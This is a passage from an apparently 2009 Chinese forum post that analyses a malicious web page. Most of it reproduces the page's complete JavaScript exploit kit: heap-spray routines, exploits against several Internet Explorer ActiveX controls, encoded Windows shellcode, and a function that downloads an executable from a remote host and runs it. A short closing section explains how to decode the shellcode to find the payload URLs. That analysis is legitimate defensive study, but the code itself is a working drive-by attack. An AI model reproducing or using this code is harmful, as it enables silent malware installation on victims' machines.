114. var len = memo["plunger"].length;
     
115. eval("memo["plunger"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
     
116. }
     
117. }
     
118. }
     
119. function alloc(arg, tag){
     
120. var size;
     
121. size = arg;
     
122. if (size == 32 || size == 64 || size == 256 || size == 32768) {}
     
123. if ( ! memo[tag] )memo[tag] = new Array();
     
124. var len = memo[tag].length;
     
125. memo[tag][len] = padding.substr(0, (arg-6)/2);
     
126. }
     
127. function alloc_str(arg, tag){
     
128. var size;
     
129. size = 4 + arg.length*2 + 2;
     
130. if (size == 32 || size == 64 || size == 256 || size == 32768) {}
     
131. if ( ! memo[tag])memo[tag] = new Array();
     
132. var len = memo[tag].length;
     
133. memo[tag][len] = arg.substr(0, arg.length);
     
134. }
     
135. function free(tag) {
     
136. delete memo[tag];
     
137. CollectGarbage();
     
138. flush();
     
139. }
     
140. function CreateO(o,n){
     
141. var r=null;
     
142. try{r=o.CreateObject(n)}catch(e){}
     
143. if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
     
144. if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
     
145. if(!r){try{r=o.GetObject("",n)}catch(e){}}
     
146. if(!r){try{r=o.GetObject(n,"")}catch(e){}}
     
147. if(!r){try{r=o.GetObject(n)}catch(e){}}
     
148. return(r);
     
149. }
     
150. function Go(a){
     
151. var eurl=url+"&spl=7";
     
152. var fname="w32NOFJCyliz5mm5R.exe";
     
153. var fso=a.CreateObject("Scripting.FileSystemObject","")
     
154. var sap=CreateO(a,"Shell.Application");
     
155. var x=CreateO(a,"ADODB.Stream");
     
156. var nl=null;
     
157. fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
     
158. x.Mode=3;
     
159. try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
     
160. catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
     
161. catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
     
162. catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
     
163. catch(e){return 0;}}}}
     
164. x.Type=1;
     
165. nl.send(null);
     
166. rb=nl.responseBody;
     
167. x.Open();
     
168. x.Write(rb);
     
169. x.SaveTofile(fname,2);
     
170. sap.ShellExecute(fname);
     
171. return 1;
     
172. }
     
173. function attack(s){
     
174. var obj=null;
     
175. if(s==1){
     
176. var i=0;
     
177. var target=new Array("BD96C556-65A3-11D0-983A-00C04FC29E36","BD96C556-65A3-11D0-983A-00C04FC29E30","AB9BCEDD-EC7E-47E1-9322-D4A210617116","0006F033-0000-0000-C000-000000000046","0006F03A-0000-0000-C000-000000000046","6e32070a-766d-4ee6-879c-dc1fa91d2fc3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-4331-8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F-1B2D-4831-A9FD-874847682010","BA018599-1DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
     
178. while(target[i]){
     
179. var a=null;
     
180. a=document.createElement("object");
     
181. a.setAttribute("classid","clsid:"+target[i]);
     
182. if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
     
183. i++;
     
184. }
     
185. sleep("attack(4);",4000);
     
186. return 0;
     
187. }
     
188. if(s==3){
     
189. try{
     
190. obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
     
191. if(obj){
     
192. ms("&spl=8");
     
193. for(var i=0;i<128;i++){
     
194. var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
     
195. try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
     
196. var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
     
197. }
     
198. sleep("attack(7);",2000);
     
199. return 0;
     
200. }
     
201. }catch(e){}
     
202. sleep("attack(7);",1);
     
203. return 0;
     
204. }
     
205. if(s==4){
     
206. try{
     
207. obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
     
208. if(obj){
     
209. ms("&spl=9");
     
210. z=Math.ceil(0x0c0c0c0c);
     
211. z=document.scripts[0].createControlRange().length;
     
212. sleep("attack(3);",2000);
     
213. return 0;
     
214. }
     
215. }catch(e){}
     
216. sleep("attack(3);",1);
     
217. return 0;
     
218. }
     
219. if(s==7){
     
220. try{
     
221. obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
     
222. if(obj){
     
223. ms("&spl=10");
     
224. var buf = "";
     
225. while (buf.length < 5000) buf += "\x0c\x0c\x0c\x0c";
     
226. obj.SetFormatLikeSample(buf);
     
227. sleep("attack(9);",2000);
     
228. return 0;
     
229. }
     
230. }catch(e){}
     
231. sleep("attack(9);",1);
     
232. return 0;
     
233. }
     
234. if(s==9){
     
235. try{
     
236. obj=cobj("DirectAnimation.PathControl");
     
237. if(obj){
     
238. ms("&spl=11");
     
239. init();
     
240. var jmpecx = 0x0c0c0c0c;
     
241. var vtable = addr(0x7ceb9090);
     
242. for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
     
243. vtable += padding.substr(0, (1008-138)/2);
     
244. var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
     
245. var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
     
246. CollectGarbage();
     
247. flush();
     
248. for (var i = 0; i < 100; i++)alloc_str(vtable);
     
249. alloc_str(vtable, "lookaside");
     
250. free("lookaside");
     
251. for (var i = 0; i < 100; i++)alloc(0x2010);
     
252. for (var i = 0; i < 2; i++) {
     
253. alloc_str(fakeObjChunk);
     
254. alloc_str(fakeObjChunk, "freeList");
     
255. }
     
256. alloc_str(fakeObjChunk);
     
257. free("freeList");
     
258. obj.KeyFrame(0x40000801, new Array(1), new Array(1));
     
259. sleep("attack(10);",2000);
     
260. return 0;
     
261. }
     
262. }catch(e){}
     
263. sleep("attack(10);",1);
     
264. return 0;
     
265. }
     
266. if(s==10){
     
267. snpac();
     
268. return 0;
     
269. }
     
270. }
     
271. 
     
272. function xml(){
     
273. var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6E2F%u726F%u6874%u682D%u736F%u2E74%u656E%u2F74%u632F%u7373%u692F%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u383D%u3738%u7326%u6C70%u353D");
     
274. var spray = unescape("%u0a0a%u0a0a");
     
275. do { spray += spray; } while(spray.length < 0xd0000);
     
276. memory = new Array();
     
277. for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }
     
278. document.getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
     
279. }
     
280. function pdf(){
     
281. try {
     
282. var obj = null;
     
283. obj = new ActiveXObject("AcroPDF.PDF");
     
284. if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
     
285. if (obj) {document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://north-host.net//css/i/pdf.php?id=887' type='application/pdf'></embed>";}
     
286. } catch(e) {
     
287. document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://north-host.net//css/i/pdf.php?id=887' type='application/pdf'></embed>";
     
288. }
     
289. setTimeout("xml()", 100);
     
290. }
     
291. 
     
292. function snpac(){
     
293. var buf1 = 'http://north-host.net//css/i/load.php?id=887&spl=4';
     
294. try{
     
295. var obj = document.createElement('object');
     
296. obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
     
297. obj.setAttribute("id", "obj");
     
298. obj.SnapshotPath = buf1;
     
299. obj.CompressedPath = 'C:\NOFCym2lizm5Rw35.exe';
     
300. obj.PrintSnapshot();
     
301. } catch(e) {}
     
302. setTimeout("pdf()", 300);
     
303. }
     
304. 
     
305. attack(1);
     

复制代码

这就是我们要找的内容啦！先看这一行：

1. var buf1 = 'http://north-host.net//css/i/load.php?id=887&spl=4';

复制代码

这里是第一个网马地址。
然后看这里：

1. var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6E2F%u726F%u6874%u682D%u736F%u2E74%u656E%u2F74%u632F%u7373%u692F%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u383D%u3738%u7326%u6C70%u353D");

复制代码

很清楚地写着shellcode！还等什么，解密出EXE文件的地址吧！
复制双引号里面的内容，然后粘贴到Misc Decoders页面，单击UCS2 To Hex按钮，可以看到ShellCode的原貌了。
再次复制全部内容，以HEX形式粘贴到Shellcode analyzer页面中，第二个网马地址浮出水面！

[ 本帖最后由 SONGBOWEN 于 2009-1-8 00:07 编辑 ]